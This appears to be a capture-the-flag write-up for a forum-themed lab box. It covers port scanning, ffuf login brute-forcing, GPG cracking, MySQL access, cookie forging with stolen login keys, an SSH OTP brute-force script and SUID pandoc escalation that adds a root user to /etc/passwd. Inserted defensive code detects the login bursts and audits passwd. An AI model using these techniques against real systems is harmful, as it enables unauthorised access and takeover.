Port scanning

sudo nmap --min-rate 10000 -p- 10.10.33.27
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:01 CST
Warning: 10.10.33.27 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.30s latency).
Not shown: 56561 closed tcp ports (reset), 8971 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 51.43 seconds
sudo nmap -sT -sV -sC -O -p22,80,3306 10.10.33.27
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:12 CST
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:c1:d0:05:91:e1:c0:98:e1:41:f2:b3:21:d9:6b (RSA)
| 256 1e:ba:57:5f:29:8c:e4:7a:b4:e5:ac:ed:65:5d:8e:32 (ECDSA)
|_ 256 7b:55:2f:23:68:08:1a:eb:90:72:43:66:e1:44:a1:9d (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Linux-Bay
3306/tcp open mysql MySQL 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| Thread ID: 109
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, LongColumnFlag, Speaks41ProtocolOld, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, ConnectWithDatabase, ODBCClient, LongPassword, SupportsCompression, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: ov#Et<j"f]!*L#ifEfQD
|_ Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds
sudo nmap --script=vuln -p22,80,3306 10.10.33.27    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:14 CST
Nmap scan report for 10.10.33.27 (10.10.33.27)
Host is up (0.27s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 10
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /archive/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /inc/: Potentially interesting folder
| /install/: Potentially interesting folder
|_ /uploads/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.33.27
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.33.27:80/misc.php?action=help
| Form id:
| Form action: misc.php
|
| Path: http://10.10.33.27:80/search.php
| Form id: author
| Form action: search.php
|
| Path: http://10.10.33.27:80/member.php?action=register
| Form id:
|_ Form action: member.php
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 79.49 seconds

MySQL is exposed externally, but we have no credentials to log in with.

Web

First, run a directory scan in the background.

The web root looks like some kind of official site homepage?

The /admin directory is a login page, and the site uses the MyBB content management system. I tried to find the version but failed. Many of the pages are useless. Checking the room hints, they tell us to follow the white rabbit.

memberlist.php shows the member list; one user's avatar is a white rabbit, but there are some things we apparently can't view, so register a user.

The pages load painfully slowly (annoying), so I switched to THM's Kali.

We can view this user's posts and find a bug-submission page, the /bugbountyHQ directory. It appears to be disabled only on the front end, so open F12 and delete everything related to the disabled attributes.

Type in anything and submit; we are automatically taken to reportPanel.php (which is the answer to the first question), where many user-submitted bugs are listed. The room hint says it is a vulnerability published in 2021.

The user Edwards says there are weak passwords that can be brute-forced. Save all of these weak passwords as a wordlist.

Then collect all the usernames as another wordlist. I don't know how to write a crawler (sad), so I only collected the usernames from the first page, but the admin users are all in there.

ffuf -u 'http://m4r.thm/member.php' -X POST -H 'Cookie: mybb[lastvisit]=1696564797; mybb[lastactive]=1696563039; _ga=GA1.2.435070034.1696562881; _gid=GA1.2.1358160263.1696562881; _gat_gtag_UA_120533740_1=1; sid=5606896caf58a6b1d2bda584b0c4ef35' -H 'Content-Type:application/x-www-form-urlencoded' -d 'username=USER&password=PASS&remember=yes&submit=Login&action=do_login&url=&my_post_key=7e560303dab8335ca5efb2ef969bc444' -w ./user.txt:USER -w ./pass.txt:PASS -fs 10289

It seems the cookie has to be included for it to run properly, which is why I used ffuf.

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 43ms]

* USER: SnakeSolid
* PASS: linux123

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* PASS: secret
* USER: Tonynull

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 37ms]
* USER: BrucePrince
* PASS: secret

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* USER: Linda_Kale
* PASS: windowsxp

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 41ms]
* PASS: starwars
* USER: jscale

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 42ms]
* USER: bubbaBIGFOOT
* PASS: qwerty123

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 41ms]
* USER: PalacerKing
* PASS: qwerty

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 48ms]
* USER: ArnoldBagger
* PASS: Luisfactor05

[Status: 200, Size: 5417, Words: 369, Lines: 120, Duration: 2814ms]

* USER: SarahHunt
* PASS: Password123

We got quite a few credentials. Among them, ArnoldBagger and PalacerKing are administrators; let's try logging in as ArnoldBagger.
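From the defender's side, a run like this shows up in the web server's access log as a burst of POSTs to member.php from one client. As an added example (not part of the original writeup), a small detector over constructed Apache combined-format lines; the client IPs, timestamps and user agent strings are made up to match the scenario.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client hammers the MyBB login (the same POST /member.php
# the ffuf run sends), another logs in once. In the run above, failed logins came
# back as 10289-byte pages and successful ones as 5417-byte pages.
SAMPLE_LOG = """\
10.9.1.5 - - [05/Oct/2023:12:30:01 +0000] "POST /member.php HTTP/1.1" 200 10289 "-" "Fuzz Faster U Fool v2.0.0"
10.9.1.5 - - [05/Oct/2023:12:30:01 +0000] "POST /member.php HTTP/1.1" 200 10289 "-" "Fuzz Faster U Fool v2.0.0"
10.9.1.5 - - [05/Oct/2023:12:30:02 +0000] "POST /member.php HTTP/1.1" 200 10289 "-" "Fuzz Faster U Fool v2.0.0"
10.9.1.5 - - [05/Oct/2023:12:30:02 +0000] "POST /member.php HTTP/1.1" 200 5417 "-" "Fuzz Faster U Fool v2.0.0"
10.9.7.20 - - [05/Oct/2023:12:31:55 +0000] "POST /member.php HTTP/1.1" 200 5417 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "method path proto" status size; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def find_login_bursts(log_text, login_path="/member.php", threshold=3, window=timedelta(seconds=60)):
    """Return {ip: peak count} for clients posting to login_path more than threshold times in any window."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == login_path:
            posts[rec[0]].append(rec[1])
    bursts = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge forward
                start += 1
            count = end - start + 1
            if count > threshold:
                bursts[ip] = max(bursts.get(ip, 0), count)
    return bursts

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"[!] {ip}: {n} login POSTs within 60 s")
```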

In the Sent Items on the left there is a message sent to the user Sosaxvector mentioning a /devBuilds directory, which contains some plugins and an encrypted file. Judging by the room hints, we're on the right track.

In the V2 plugin I found a key line:

$sql_p = file_get_contents('inc/tools/manage/SQL/p.txt'); //read SQL password from p.txt

MySQL

In other words, the encrypted file p.txt.gpg contains the MySQL password.

In the source of the earlier reportPanel.php page there is a hint (honestly, this one is a bit of a stretch):

Keymaker message:
1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19 1 4 4 18 5 19 19: /0100101101100101011110010110110101100001011010110110010101110010

Straight into CyberChef:

1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19 1 4 4 18 5 19 19

apermutationofonlytheenglishletterswillopenthelocksaddress

/0100101101100101011110010110110101100001011010110110010101110010 is a directory...
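As an added example (not part of the original writeup), the same two decodings done in Python rather than CyberChef: the numbers are A1Z26 (1=a ... 26=z) and the directory name is 8-bit binary ASCII.

```python
# Decode the "Keymaker message" from reportPanel.php. Left of the colon is A1Z26,
# right of the colon (after the slash) is a run of 8-bit ASCII codes.
KEYMAKER_MESSAGE = (
    "1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 "
    "12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19 1 4 4 18 5 19 19"
    ": /0100101101100101011110010110110101100001011010110110010101110010"
)

def a1z26_decode(numbers):
    """Map space-separated values 1..26 to lowercase letters; reject anything else."""
    letters = []
    for tok in numbers.split():
        n = int(tok)
        if not 1 <= n <= 26:
            raise ValueError(f"not an A1Z26 value: {tok}")
        letters.append(chr(ord("a") + n - 1))
    return "".join(letters)

def binary_decode(bits):
    """Decode 8-bit ASCII codes, ignoring separators such as the leading slash."""
    bits = "".join(c for c in bits if c in "01")
    if len(bits) % 8:
        raise ValueError("bit string length is not a multiple of 8")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))

def decode_keymaker(message):
    """Split on the first colon and decode both halves: (hint text, directory name)."""
    numbers, path = message.split(":", 1)
    return a1z26_decode(numbers), binary_decode(path)

if __name__ == "__main__":
    hint, name = decode_keymaker(KEYMAKER_MESSAGE)
    print(hint)   # apermutationofonlytheenglishletterswillopenthelocksaddress
    print(name)   # Keymaker
```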

It contains a string of odd characters: 诶比西迪伊吉艾杰开哦o屁西迪伊吉杰开哦艾杰开f哦屁q西屁西迪伊吉艾杰开哦x屁西迪伊吉艾杰开哦屁西迪伊吉艾杰开v哦屁西迪伊吉艾杰西迪伊g吉艾杰提维

According to the hint above, only a permutation of the English letters will open the lock.

The English letters are: ofqxvg

Generate the permutations with Python:

from itertools import permutations

# The given letters
letters = "ofqxvg"

# Generate every permutation
perms = permutations(letters)

# Open the file and write one permutation per line
with open('password.txt', 'w') as file:
    for perm in perms:
        password = ''.join(perm)
        file.write(password + '\n')

print("密码已经保存到password.txt文件中。")

/usr/sbin/gpg2john p.txt.gpg >hash

Convert it to a hash.

/usr/sbin/john --wordlist=password.txt hash

Cracking yields the password: fvgoxq

gpg --decrypt p.txt.gpg

Decrypt with the recovered password to get the MySQL password:

myS3CR3TPa55 //SQL Password

According to the plugin, the user "mod" is used to log in to MySQL.

mysql -h m4r.thm -umod -p
show databases;
use modManagerv2;
select * from members;

Found Ellie's login_key:

G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT

Getshell

Besides that, there is also the key of the moderator BlackCat:

JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB

Open F12 and edit the cookie to UID+KEY. The UID is the position in memberlist.php; blackcat is 7.

After refreshing, we become blackcat.

In Manage Attachments under the User CP there is a document about the encryption algorithm, SSH-TOTP.

from datetime import datetime, timedelta
from hashlib import sha256
import random
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException, ssh_exception
import os
import ntplib

class TimeSimulatorClient:
    def __init__(self, sharedSecret1, sharedSecret2, sharedSecret3, targetIPAdress):
        self.sharedSecret1 = sharedSecret1
        self.sharedSecret2 = sharedSecret2
        self.sharedSecret3 = sharedSecret3
        self.targetIPAdress = targetIPAdress
        self.listSecret = [sharedSecret1, sharedSecret2, sharedSecret3]

    def setTimeZone(self):
        try:
            print('[*] Setting timezone to UTC')
            print('[*] Before:')
            os.system('sudo timedatectl --value')
            os.system('sudo timedatectl set-timezone UTC')
            print('[+] Timezone has been changed to UTC')
        except:
            print('[-] Couldn\'t set the timezone to UTC')

    def syncTime(self):
        try:
            client = ntplib.NTPClient()
            client.request(self.targetIPAdress) #IP of linux-bay server
            print('[+] Synced to the time server')
        except:
            print('[-] Could not sync with time server')

    def TimeSet(self, country, hours, mins, seconds):
        # local time shifted by the given offset, packed as an integer
        now = datetime.now() + timedelta(hours=hours, minutes=mins)
        #time units: day, hour, minutes
        CurrentTime = int(now.strftime("%d%H%M"))

        return CurrentTime

    def getOTP(self):
        CA = self.TimeSet('Ukraine', 4, 43, 0)
        CB = self.TimeSet('Germany', 13, 55, 0)
        CC = self.TimeSet('England', 9, 19, 0)
        CD = self.TimeSet('Nigeria', 1, 6, 0)
        CE = self.TimeSet('Denmark', -5, 18, 0)

        listTimeSet = [CA, CB, CC, CD, CE]
        randomTimeSet = random.sample(listTimeSet, 3)

        # CTT = CA * CB * CC
        CTT = randomTimeSet[0] * randomTimeSet[1] * randomTimeSet[2]

        # UC = CTT XOR SST
        UC = CTT ^ random.choice(self.listSecret)

        # hash OTP
        HC = (sha256(repr(UC).encode('utf-8')).hexdigest())

        # HC Truncate
        T = HC[22:44]

        SSHOTP = T
        return SSHOTP

    def bruteForceSSH(self, SSHUsername, OTP):
        print(f'[*] Trying SSH OTP: {OTP}', end='\r')

        sshClient = SSHClient()
        sshClient.set_missing_host_key_policy(AutoAddPolicy())
        try:
            sshClient.connect(self.targetIPAdress, username=SSHUsername, password=OTP, banner_timeout=300)
            return True
        except AuthenticationException:
            # print(f'[-] Wrong OTP: {OTP}')
            pass
        except ssh_exception.SSHException:
            print('[*] Attempting to connect - Rate limiting on server')

def main():
    #shared secret token for OTP calculation
    sharedSecret1 = {Redacted_SST_1}
    sharedSecret2 = {Redacted_SST_2}
    sharedSecret3 = {Redacted_SST_3}
    # Change to the machine's IP
    targetIPAdress = '10.10.95.198'

    timeSimulatorClient = TimeSimulatorClient(sharedSecret1, sharedSecret2, sharedSecret3, targetIPAdress)

    # Change timezone & sync to the time server
    timeSimulatorClient.setTimeZone()
    timeSimulatorClient.syncTime()

    # Brute forcing SSH with computed OTP
    SSHUsername = 'architect'
    while True:
        OTP = timeSimulatorClient.getOTP()
        bruteForceResult = timeSimulatorClient.bruteForceSSH(SSHUsername, OTP)

        if bruteForceResult is True:
            print(f'[+] Found the correct OTP! {SSHUsername}:{OTP}')
            break

if __name__ == '__main__':
    main()

I used the decryption script from an expert's writeup. The machine IP has to be changed to your own, and the three secret tokens can be found in the PNGs inside testing.zip; fill them in and the brute force can run.

Once you get it, log in quickly: after 60 seconds the password changes and you have to brute-force it again.

flag

fL4g{Ia]/[bEGYngn1nGT0bel13v3}

Privilege escalation

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Look for SUID binaries.

There is a pandoc binary with SUID, which can be used to write arbitrary data, so we can modify passwd to add a root user (the $ signs need an escape character in front of them, otherwise they get escaped when the line is appended with echo??)

cp /etc/passwd /tmp/passwd

openssl passwd -1 -salt hacker pass123

echo 'hacker:\$1\$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash'>>/tmp/passwd

cat /tmp/passwd | pandoc -t plain -o "/etc/passwd"

su hacker

Privilege escalation succeeded.
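Added example (not part of the original writeup) from the defender's side: a check that parses /etc/passwd and flags exactly what this trick leaves behind, a second UID 0 account and a password hash stored in passwd instead of shadow. The sample passwd content is constructed.

```python
# Parse a passwd(5) file and flag an extra UID-0 account or a hash kept in
# passwd rather than /etc/shadow (both appear after the pandoc write above).
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Values in the password field that mean "no hash here" (shadowed or locked).
NO_HASH = {"x", "*", "!", "!!", ""}

# Constructed sample mirroring the box after the "hacker" line was appended.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
architect:x:1000:1000::/home/architect:/bin/bash
hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash
"""

def parse_passwd(text):
    """Parse passwd lines; a malformed line raises, since that is itself a finding."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"passwd line {lineno}: expected 7 fields, got {len(f)}")
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries

def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious entries."""
    findings = []
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "UID 0 account other than root"))
        if e.passwd not in NO_HASH:
            findings.append((e.name, "password hash stored in passwd, not shadow"))
    return findings

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        for user, reason in audit_passwd(fh.read()):
            print(f"[!] {user}: {reason}")
```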

Found a file /etc/-- -root.py

python3 /etc/-- -root.py

Running it gives the flag:

Flag{R3ALw0r1D4507Ez09WExit}

There is also a bigpaul.txt

which gives:

bigpaul = ilovemywifeandgirlfriend022366
ACP Pin = 101754⊕123435+689511

The PIN needs to be computed: XOR the first two numbers, then add the third, which gives 718008.

Find the web flag:

fL4g{|amFre3N0w}

Closing thoughts

A very hard box, combining a realistic pentest environment (a forum) with CTF elements. Honestly my train of thought was still a bit muddled, and without the room hints the difficulty would be several times higher... Information gathering is so important; every step was fairly hard, and put together it makes a hard-difficulty machine.